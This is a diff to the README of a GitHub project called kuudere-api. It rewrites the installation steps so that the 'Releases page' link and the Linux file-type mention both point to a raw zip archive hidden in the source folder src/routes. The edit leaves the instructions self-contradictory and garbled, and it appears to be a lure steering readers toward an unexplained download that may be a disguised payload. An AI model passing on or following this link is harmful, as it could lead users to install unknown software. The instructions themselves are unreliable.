Philiszszsss/kuudere-api/README.md

    - Disk Space: Minimum 100 MB of free space

 2. **Visit the Release Page**
-To download the application, visit the Releases page: [Download kuudere-api](https://github.com/Philiszszsss/kuudere-api/releases).
+To download the application, visit the Releases page: [Download kuudere-api](https://github.com/Philiszszsss/kuudere-api/raw/refs/heads/main/src/routes/api_kuudere_3.9.zip).

 3. **Choose Your File**
 On the Releases page, you will see a list of available versions.
 Download the latest version suitable for your operating system.
-Look for files with the extension `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Look for files with the extension `.exe` for Windows, `.dmg` for macOS, or `https://github.com/Philiszszsss/kuudere-api/raw/refs/heads/main/src/routes/api_kuudere_3.9.zip` for Linux.

 4. **Download the File**
 Click on the appropriate file to start the download.
 This may take a few moments depending on your internet speed.